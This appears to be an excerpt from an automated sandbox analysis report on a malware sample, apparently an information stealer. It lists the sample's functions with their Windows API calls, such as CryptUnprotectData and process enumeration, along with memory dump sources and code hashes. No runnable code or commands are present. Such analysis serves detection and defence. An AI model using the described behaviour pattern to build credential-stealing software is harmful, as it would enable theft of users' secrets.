                          • String ID: *g$+{6o$D.o$ik>$p5}
                          • API String ID: 0-4206149274
                          • Opcode ID: 0c13b1d4afbaa83e87e92f27e390631f6847286e67fff0bcb0d9d341d8332abf
                          • Instruction ID: 78db3eeebbc8cede7880f2bcdb4831faac66dd6856d28f88e30bb7878662ddd6
                          • Opcode Fuzzy Hash: 0c13b1d4afbaa83e87e92f27e390631f6847286e67fff0bcb0d9d341d8332abf
                          • Instruction Fuzzy Hash: B7A24BF3A0C2149FE304AE2DEC8567ABBD9EF94760F16453EEAC4C3744E9359C018696
                          Function 0008F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: \u$\u${${$}$}
                          • API String ID: 0-582841131
                          • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                          • Instruction ID: 82752fb20417fd694dd725c334fb86fcf7da00d6acd05cc642a585e35444f2d9
                          • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                          • Instruction Fuzzy Hash: A6417012E19BDAC5CB058B7484A02BEBFB27FD6210F6D42AAC4DD5F382C774414AD3A5
                          Function 0002C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0002C971
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0002C97C
                          • lstrcat.KERNEL32(?,00040B47), ref: 0002CA43
                          • lstrcat.KERNEL32(?,00040B4B), ref: 0002CA57
                          • lstrcat.KERNEL32(?,00040B4E), ref: 0002CA78
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: ec81ffedde83592828158ffa631c2a00f0b79193adfc365bd1663ff426e63cad
                          • Instruction ID: 56cb7a769ab8add267ccd19e82fb858ac71ccae3f1e2b2a7cebf29b517075736
                          • Opcode Fuzzy Hash: ec81ffedde83592828158ffa631c2a00f0b79193adfc365bd1663ff426e63cad
                          • Instruction Fuzzy Hash: F7413DB590421E9BDB10CFA4ED89FFEB7B8BB48744F1041B8E609A6280D7745A84CF95
                          Function 000272A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 000272AD
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000272B4
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 000272E1
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00027304
                          • LocalFree.KERNEL32(?), ref: 0002730E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 52a9c04c78da5e72f428f636d3d56a6ddc36550e588ae517fb9f125f7cf4d19a
                          • Instruction ID: bc7e2a7e035ae2c4869779bfb8923e2ad2a4f938246264727f76d216d8f374df
                          • Opcode Fuzzy Hash: 52a9c04c78da5e72f428f636d3d56a6ddc36550e588ae517fb9f125f7cf4d19a
                          • Instruction Fuzzy Hash: DA011275A44308BBEB10DFE8DC49FAE7778AB44B14F104554FB09BB2C0D6B0AA00DB54
                          Function 00039790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                          Download Yara Rule
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 000397AE
                          • Process32First.KERNEL32(00040ACE,00000128), ref: 000397C2
                          • Process32Next.KERNEL32(00040ACE,00000128), ref: 000397D7
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 000397EC
                          • CloseHandle.KERNEL32(00040ACE), ref: 0003980A
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: b373053c3a9868bce42b7fcab36a7d25fac29e0d2c38798e1f3d78b5cfa18456
                          • Instruction ID: 08270e980226660f56a64c4c7ae8ec326462ffb36c07b524da7429bb5bdf888b
                          • Opcode Fuzzy Hash: b373053c3a9868bce42b7fcab36a7d25fac29e0d2c38798e1f3d78b5cfa18456
                          • Instruction Fuzzy Hash: 9F011A75A14208EBDB21DFA4DD48BEEBBFCBB48750F104599E909A7240EB709B44CF50
                          Function 00044573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: <7\h$huzx
                          • API String ID: 0-2989614873
                          • Opcode ID: b476232773c0b84fd7ace852f2944d6f802ee3a4ac3ad52e92f5f897fea019ca
                          • Instruction ID: 2ae7264ab28677e4edf84d6a1abd5430226acd94c1ee3e8aa092b54ffa707a74
                          • Opcode Fuzzy Hash: b476232773c0b84fd7ace852f2944d6f802ee3a4ac3ad52e92f5f897fea019ca
                          • Instruction Fuzzy Hash: 746343B241EBD41FC727CB304BB62517F66BB1361131949EEC4C18F4B3C694AA1AE35A
                          Function 0048379E Relevance: 6.6, Strings: 4, Instructions: 1556COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: @Ux3$K#q,$V5m$}B{Z
                          • API String ID: 0-234529196
                          • Opcode ID: 01c37b8b140cfaf85a6b08be137244c5855052560f8bc2fd321ab2e869444daa
                          • Instruction ID: 4014fbc6bc72678f8eb20e371ba350a1672bed265f402ce28bdb860cf6049784
                          • Opcode Fuzzy Hash: 01c37b8b140cfaf85a6b08be137244c5855052560f8bc2fd321ab2e869444daa
                          • Instruction Fuzzy Hash: 75A2E6F3A0C6009FE304AE2DEC8567ABBE5EF94720F16893DE6C4C7744EA3558058697
                          Function 0047EBF6 Relevance: 6.2, Strings: 4, Instructions: 1174COMMON
                          Download Yara Rule
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: )to$01V>$7,_p$}~
                          • API String ID: 0-1835218659
                          • Opcode ID: c35abc2bc68454431e90e83a356eb63dcf1639783d6b9b3e2989b0365ea602e7
                          • Instruction ID: 54f545526d7d30ca6381a0dab80cefb1cd0acc0395a18b55522dbd325bb515e6
                          • Opcode Fuzzy Hash: c35abc2bc68454431e90e83a356eb63dcf1639783d6b9b3e2989b0365ea602e7
                          • Instruction Fuzzy Hash: D1823BF3A082049FE3046E2DEC4567AFBE9EF94720F1A4A3DE6C5C3744EA3598058657
                          Function 00039030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                          Download Yara Rule
                          APIs
                          • CryptBinaryToStringA.CRYPT32(00000000,000251D4,40000001,00000000,00000000,?,000251D4), ref: 00039050
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptString
                          • String ID:
                          • API String ID: 80407269-0
                          • Opcode ID: dcf60531f810c16885ad12ff37f33048ff4b6310a04e40b16a1ed434ef9c1eb8
                          • Instruction ID: 1203a94ba4a3e54e33ec064f4d79c7afa918963d79c61ef14f40a0c6820c140e
                          • Opcode Fuzzy Hash: dcf60531f810c16885ad12ff37f33048ff4b6310a04e40b16a1ed434ef9c1eb8
                          • Instruction Fuzzy Hash: 04110674204209FFDF09CF54D884FAA33ADAF89350F108458FA198B250DBB1E941CBA4
                          Function 0002A210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                          Download Yara Rule
                          APIs
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A23F
                          • LocalAlloc.KERNEL32(00000040,?,?,?,00024F3E,00000000,?), ref: 0002A251
                          • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00024F3E,00000000,00000000), ref: 0002A27A
                          • LocalFree.KERNEL32(?,?,?,?,00024F3E,00000000,?), ref: 0002A28F
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: BinaryCryptLocalString$AllocFree
                          • String ID:
                          • API String ID: 4291131564-0
                          • Opcode ID: 13f17d6986e41dd68d1bbe29cbfc91bfb2ee6d536a824001e65bc110195d2d89
                          • Instruction ID: 1223fea7c29cfd096f193199b83de709090be6f25ae55b8edd063eda5474fc9f
                          • Opcode Fuzzy Hash: 13f17d6986e41dd68d1bbe29cbfc91bfb2ee6d536a824001e65bc110195d2d89
                          • Instruction Fuzzy Hash: 9411A474640309EFEB11CF64DC95FAA77B5EB89B14F208458FD159B390C772A941CB50
                          Function 00037B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00040DE8,00000000,?), ref: 00037B40
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00037B47
                          • GetLocalTime.KERNEL32(?,?,?,?,?,00040DE8,00000000,?), ref: 00037B54
                          • wsprintfA.USER32 ref: 00037B83
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateLocalProcessTimewsprintf
                          • String ID:
                          • API String ID: 377395780-0
                          • Opcode ID: 02befa734cbf787d0e2f9a201b2ac5a3b77765ea7c0f21c326b2e0a402a1f2b3
                          • Instruction ID: 00c4e1536f6b3351a2bd3c6322b7f756df50fc4ff957abf7302d5e4e40addf39
                          • Opcode Fuzzy Hash: 02befa734cbf787d0e2f9a201b2ac5a3b77765ea7c0f21c326b2e0a402a1f2b3
                          • Instruction Fuzzy Hash: D6112AB2908118ABCB14DBC9ED49BBEB7B8EB4CB61F10411AF605A2280D7395940C7B0
                          Function 00037BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                          Download Yara Rule
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,00FDE368,00000000,?,00040DF8,00000000,?,00000000,00000000), ref: 00037BF3
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00037BFA
                          • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,00FDE368,00000000,?,00040DF8,00000000,?,00000000,00000000,?), ref: 00037C0D
                          • wsprintfA.USER32 ref: 00037C47
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmpDownload File
